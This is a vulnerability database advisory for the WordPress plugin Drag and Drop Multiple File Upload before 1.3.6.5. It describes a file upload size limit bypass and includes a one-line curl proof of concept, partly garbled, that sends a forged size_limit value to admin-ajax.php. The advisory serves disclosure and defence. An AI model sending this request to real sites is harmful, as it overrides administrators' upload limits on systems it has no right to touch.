Lucene search

K
wpvulndbSanjay DasWPVDB-ID:035DFFEF-4B4B-4AFB-9776-7F6C5E56452C
HistorySep 26, 2022 - 12:00 a.m.

Drag and Drop Multiple File Upload < 1.3.6.5 - File Upload Size Limit Bypass

2022-09-2600:00:00
Sanjay Das
wpscan.com
8
file upload bypass
plugin vulnerability
form input control

0.001 Low

EPSS

Percentile

25.0%

The plugin does not properly check for the upload size limit set in forms, taking the value from user input sent when submitting the form. As a result, attackers could control the file length limit and bypass the limit set by admins in the contact form.

PoC

curl -X POST -F “size_limit=10485760” -F “action=dnd_codedropz_upload” -F “type=click” -F “form_id=156” -F “upload_name=upload-file-235” -F “[email protected]https://example.com/wordpress/wp-admin/admin-ajax.php

0.001 Low

EPSS

Percentile

25.0%

Related for WPVDB-ID:035DFFEF-4B4B-4AFB-9776-7F6C5E56452C